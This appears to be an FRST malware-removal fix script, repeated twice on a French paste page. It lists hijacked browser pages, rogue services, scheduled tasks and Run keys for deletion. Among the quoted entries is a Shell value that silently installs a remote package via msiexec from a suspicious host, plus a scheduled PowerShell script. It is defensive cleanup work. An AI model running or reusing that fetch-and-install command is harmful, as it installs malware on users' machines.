Publicité
Publicité
Format du document : text/plain
Prévisualisation
start::
CreateRestorePoint:
CloseProcesses:
ShellExecuteHooks: Pas de nom - {48F04F78-DE45-11E6-8A81-64006A5CFC23} - -> Pas de fichier
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited)
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} [Pays - ]
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE [Pays US - 69.16.231.56]
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} [Pays - ]
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKU\S-1-5-21-3527481349-2306919907-3425379913-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2018-07-19] (IObit)
FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier]
R2 SparkSvc; C:\Program Files (x86)\baidu\Baidu Browser\sparkservice.exe [96784 2017-08-16] (Baidu Inc.)
S3 SparkUpdater; C:\Program Files (x86)\Baidu\SparkUpdate\Sparkupdate.exe [1372472 2016-01-15] (Baidu.com, Inc.)
RemoveDirectory: C:\Program Files (x86)\baidu
S3 BprotectEx; pas de ImagePath
S3 expressvpnsplittunnel; pas de ImagePath
S1 hnvaornf; pas de ImagePath
S1 ktwmkzjb; pas de ImagePath
S1 p1170849579am; pas de ImagePath
S1 p1441342821am; pas de ImagePath
S1 p1479173690am; pas de ImagePath
S1 p1487674648am; pas de ImagePath
S1 p1487926957am; pas de ImagePath
S1 p1487927091am; pas de ImagePath
S1 p1487927226am; pas de ImagePath
S1 p1487950865am; pas de ImagePath
S1 p1488208420am; pas de ImagePath
S1 p1488208516am; pas de ImagePath
S1 p1488288266am; pas de ImagePath
S1 p1488379278am; pas de ImagePath
S1 p1488379420am; pas de ImagePath
S1 p1488885334am; pas de ImagePath
S1 p1488885610am; pas de ImagePath
S1 p1489047223am; pas de ImagePath
S1 p1489047372am; pas de ImagePath
S1 p1490185907am; pas de ImagePath
S1 p1490185997am; pas de ImagePath
S1 p1490186046am; pas de ImagePath
S1 p1490186089am; pas de ImagePath
S1 p1490264007am; pas de ImagePath
S1 p1490264137am; pas de ImagePath
S1 p1490358229am; pas de ImagePath
S1 p1490793491am; pas de ImagePath
S1 p1490949514am; pas de ImagePath
S1 p1490949639am; pas de ImagePath
S1 p1745096627am; pas de ImagePath
S1 p1829733048am; pas de ImagePath
S1 p1894806702am; pas de ImagePath
S1 p2542029531am; pas de ImagePath
S1 p2957118427am; pas de ImagePath
S1 p3518639370am; pas de ImagePath
S1 p3623517036am; pas de ImagePath
S1 p3676623125am; pas de ImagePath
S1 p4207388602am; pas de ImagePath
S1 p4243700627am; pas de ImagePath
S1 p744739277am; pas de ImagePath
S3 PCFApiUtil; pas de ImagePath
S1 SRepairDrv; pas de ImagePath
S1 TSDefenseBt; pas de ImagePath
U3 aswbdisk; pas de ImagePath
U2 CWASRE; pas de ImagePath
U2 snare; pas de ImagePath
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
C:\Program Files\Hola\app\hola.exe
C:\Users\Home\AppData\Local\background_fault\aswRD.exe
Task: {665CAC13-0BD9-430C-A63B-D95CF21CE13F} - \Chetyphucty Schedule -> Pas de fichier <==== ATTENTION
FirewallRules: [{E898A386-15DE-4B98-B007-1066C2A4BB6D}] => (Allow) C:\Users\Home\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C87D0BF9-B8C6-4BE2-AAE7-CD359B5774DE}] => (Allow) C:\Users\Home\AppData\Roaming\BitTorrent\BitTorrent.exe
HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2171304 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited)
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81RjMyFUE8Ndq4FdVQFdHyNdZQNYY5NYF5NYYcNkZWOH== /q <==== ATTENTION [Pays US - 104.28.16.238]
CHR Profile: C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2018-10-11] <==== ATTENTION
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Fichier non signé] <==== ATTENTION
S2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [20538792 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION
S2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [20137056 2017-12-24] (Hola Networks Ltd.) <==== ATTENTION
RemoveDirectory: C:\Program Files\Hola
Task: {5B03C774-0CFA-47E4-A261-60DB61F56BFC} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-02-23] (IEC) <==== ATTENTION
Task: {665CAC13-0BD9-430C-A63B-D95CF21CE13F} - \Chetyphucty Schedule -> Pas de fichier <==== ATTENTION
Task: {781E86F8-E5B4-454D-9516-B65C99669F18} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {9FDAE52F-8262-4C05-A6DD-5412F9A98107} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION
Hosts:
EmptyTemp:
end::
CreateRestorePoint:
CloseProcesses:
ShellExecuteHooks: Pas de nom - {48F04F78-DE45-11E6-8A81-64006A5CFC23} - -> Pas de fichier
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited)
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} [Pays - ]
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE [Pays US - 69.16.231.56]
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} [Pays - ]
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKU\S-1-5-21-3527481349-2306919907-3425379913-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2018-07-19] (IObit)
FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier]
R2 SparkSvc; C:\Program Files (x86)\baidu\Baidu Browser\sparkservice.exe [96784 2017-08-16] (Baidu Inc.)
S3 SparkUpdater; C:\Program Files (x86)\Baidu\SparkUpdate\Sparkupdate.exe [1372472 2016-01-15] (Baidu.com, Inc.)
RemoveDirectory: C:\Program Files (x86)\baidu
S3 BprotectEx; pas de ImagePath
S3 expressvpnsplittunnel; pas de ImagePath
S1 hnvaornf; pas de ImagePath
S1 ktwmkzjb; pas de ImagePath
S1 p1170849579am; pas de ImagePath
S1 p1441342821am; pas de ImagePath
S1 p1479173690am; pas de ImagePath
S1 p1487674648am; pas de ImagePath
S1 p1487926957am; pas de ImagePath
S1 p1487927091am; pas de ImagePath
S1 p1487927226am; pas de ImagePath
S1 p1487950865am; pas de ImagePath
S1 p1488208420am; pas de ImagePath
S1 p1488208516am; pas de ImagePath
S1 p1488288266am; pas de ImagePath
S1 p1488379278am; pas de ImagePath
S1 p1488379420am; pas de ImagePath
S1 p1488885334am; pas de ImagePath
S1 p1488885610am; pas de ImagePath
S1 p1489047223am; pas de ImagePath
S1 p1489047372am; pas de ImagePath
S1 p1490185907am; pas de ImagePath
S1 p1490185997am; pas de ImagePath
S1 p1490186046am; pas de ImagePath
S1 p1490186089am; pas de ImagePath
S1 p1490264007am; pas de ImagePath
S1 p1490264137am; pas de ImagePath
S1 p1490358229am; pas de ImagePath
S1 p1490793491am; pas de ImagePath
S1 p1490949514am; pas de ImagePath
S1 p1490949639am; pas de ImagePath
S1 p1745096627am; pas de ImagePath
S1 p1829733048am; pas de ImagePath
S1 p1894806702am; pas de ImagePath
S1 p2542029531am; pas de ImagePath
S1 p2957118427am; pas de ImagePath
S1 p3518639370am; pas de ImagePath
S1 p3623517036am; pas de ImagePath
S1 p3676623125am; pas de ImagePath
S1 p4207388602am; pas de ImagePath
S1 p4243700627am; pas de ImagePath
S1 p744739277am; pas de ImagePath
S3 PCFApiUtil; pas de ImagePath
S1 SRepairDrv; pas de ImagePath
S1 TSDefenseBt; pas de ImagePath
U3 aswbdisk; pas de ImagePath
U2 CWASRE; pas de ImagePath
U2 snare; pas de ImagePath
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
C:\Program Files\Hola\app\hola.exe
C:\Users\Home\AppData\Local\background_fault\aswRD.exe
Task: {665CAC13-0BD9-430C-A63B-D95CF21CE13F} - \Chetyphucty Schedule -> Pas de fichier <==== ATTENTION
FirewallRules: [{E898A386-15DE-4B98-B007-1066C2A4BB6D}] => (Allow) C:\Users\Home\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C87D0BF9-B8C6-4BE2-AAE7-CD359B5774DE}] => (Allow) C:\Users\Home\AppData\Roaming\BitTorrent\BitTorrent.exe
HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2171304 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited)
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81RjMyFUE8Ndq4FdVQFdHyNdZQNYY5NYF5NYYcNkZWOH== /q <==== ATTENTION [Pays US - 104.28.16.238]
CHR Profile: C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2018-10-11] <==== ATTENTION
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Fichier non signé] <==== ATTENTION
S2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [20538792 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION
S2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [20137056 2017-12-24] (Hola Networks Ltd.) <==== ATTENTION
RemoveDirectory: C:\Program Files\Hola
Task: {5B03C774-0CFA-47E4-A261-60DB61F56BFC} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-02-23] (IEC) <==== ATTENTION
Task: {665CAC13-0BD9-430C-A63B-D95CF21CE13F} - \Chetyphucty Schedule -> Pas de fichier <==== ATTENTION
Task: {781E86F8-E5B4-454D-9516-B65C99669F18} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {9FDAE52F-8262-4C05-A6DD-5412F9A98107} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION
Hosts:
EmptyTemp:
end::